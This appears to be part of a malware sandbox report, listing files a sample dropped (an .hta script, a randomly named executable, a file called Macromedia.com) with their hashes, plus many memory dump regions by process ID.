  • C:\Users\Admin\AppData\Local\Temp\uUrFkJMFj.hta

    Filesize

    720B

    MD5

    a5dedf79bc2f22aa701d7d9765a8a97f

    SHA1

    c62800773f435d4c026e1b933b826fb6d6ff1ee7

    SHA256

    61f4a259fc70b959c2c863a25892810e512a9b153b1a354f8ab6d6063870fcb7

    SHA512

    7301151f078a2b524d5bd4ecc40022cba4fe2e3100a346618a682d4b02dbcf1da722aa7b1600454cdc713e096db90022290d9fdf8cc6f324d36620932763a16b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    72da42daf928e2204610000948093e50

    SHA1

    0cfe36c4c26d2d3f48bbd5455ad538224d03f344

    SHA256

    1e864444f1fb06744db03308d2dea40f6c70b4bef726437bb97233fdc41fb3a0

    SHA512

    38974dd26d754314807f8ded29df62108af5ee0882608d56f8bf782b5d16898c9b4780a81696260bc33d57630e12bc8f30ae95b7b985bffda0fe5c0537c9930c

  • \Users\Admin\AppData\Local\TempGK41BESHU8OLGVCED7YZKHTKUZNGBV20.EXE

    Filesize

    2.0MB

    MD5

    5b0a7fc38aabac34a16d0b7739a5920f

    SHA1

    247eca5db3c002ff17728a0ec84b8df3931b0924

    SHA256

    31fa3a682cac17998ecd8a575f58916e5d6fa26d5eec61f71af4898f5849717e

    SHA512

    0bb20421a6fe1a1ed30f1d0cd3275ca1ad229d77fe76a0e14c03a986c05a592364ef9ea5660f01e2b136ba90874985f5c9731ad6218648e56d4aba32c70e5abe

  • \Users\Admin\AppData\Local\Temp\764661\Macromedia.com

    Filesize

    925KB

    MD5

    62d09f076e6e0240548c2f837536a46a

    SHA1

    26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

    SHA256

    1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

    SHA512

    32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

  • memory/1188-76-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-67-0x0000000006C10000-0x00000000070C7000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-638-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-107-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-32-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-34-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-48-0x0000000006C10000-0x00000000070C7000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-69-0x0000000006C10000-0x0000000007285000-memory.dmp

    Filesize

    6.5MB

  • memory/1188-84-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-70-0x0000000006C10000-0x0000000007285000-memory.dmp

    Filesize

    6.5MB

  • memory/1188-72-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-75-0x0000000006C10000-0x0000000007285000-memory.dmp

    Filesize

    6.5MB

  • memory/1188-82-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-154-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-78-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-80-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1592-619-0x0000000000E20000-0x0000000000EEE000-memory.dmp

    Filesize

    824KB

  • memory/1640-68-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-109-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-133-0x0000000006810000-0x0000000006E85000-memory.dmp

    Filesize

    6.5MB

  • memory/1640-105-0x0000000006810000-0x0000000006E85000-memory.dmp

    Filesize

    6.5MB

  • memory/1640-132-0x0000000006810000-0x0000000006E85000-memory.dmp

    Filesize

    6.5MB

  • memory/1640-73-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-601-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-83-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-79-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-85-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-77-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-49-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-103-0x0000000006810000-0x0000000006E85000-memory.dmp

    Filesize

    6.5MB

  • memory/1640-81-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-537-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1728-612-0x00000000001A0000-0x0000000000659000-memory.dmp

    Filesize

    4.7MB

  • memory/1852-590-0x00000000064E0000-0x0000000006999000-memory.dmp

    Filesize

    4.7MB

  • memory/1852-589-0x00000000064E0000-0x0000000006999000-memory.dmp

    Filesize

    4.7MB

  • memory/2332-630-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-628-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-632-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

    Filesize

    4KB

  • memory/2332-626-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-633-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-622-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-635-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-624-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2488-591-0x0000000000EA0000-0x0000000001359000-memory.dmp

    Filesize

    4.7MB

  • memory/2488-603-0x0000000000EA0000-0x0000000001359000-memory.dmp

    Filesize

    4.7MB

  • memory/2500-108-0x0000000000850000-0x0000000000EC5000-memory.dmp

    Filesize

    6.5MB

  • memory/2500-106-0x0000000000850000-0x0000000000EC5000-memory.dmp

    Filesize

    6.5MB

  • memory/2620-71-0x0000000000320000-0x0000000000995000-memory.dmp

    Filesize

    6.5MB

  • memory/2620-74-0x0000000000320000-0x0000000000995000-memory.dmp

    Filesize

    6.5MB

  • memory/2668-12-0x00000000063A0000-0x0000000006859000-memory.dmp

    Filesize

    4.7MB

  • memory/2668-13-0x00000000063A0000-0x0000000006859000-memory.dmp

    Filesize

    4.7MB

  • memory/2832-650-0x0000000000400000-0x00000000008A3000-memory.dmp

    Filesize

    4.6MB

  • memory/3000-27-0x00000000070C0000-0x0000000007579000-memory.dmp

    Filesize

    4.7MB

  • memory/3000-31-0x00000000001A0000-0x0000000000659000-memory.dmp

    Filesize

    4.7MB

  • memory/3000-28-0x00000000070C0000-0x0000000007579000-memory.dmp

    Filesize

    4.7MB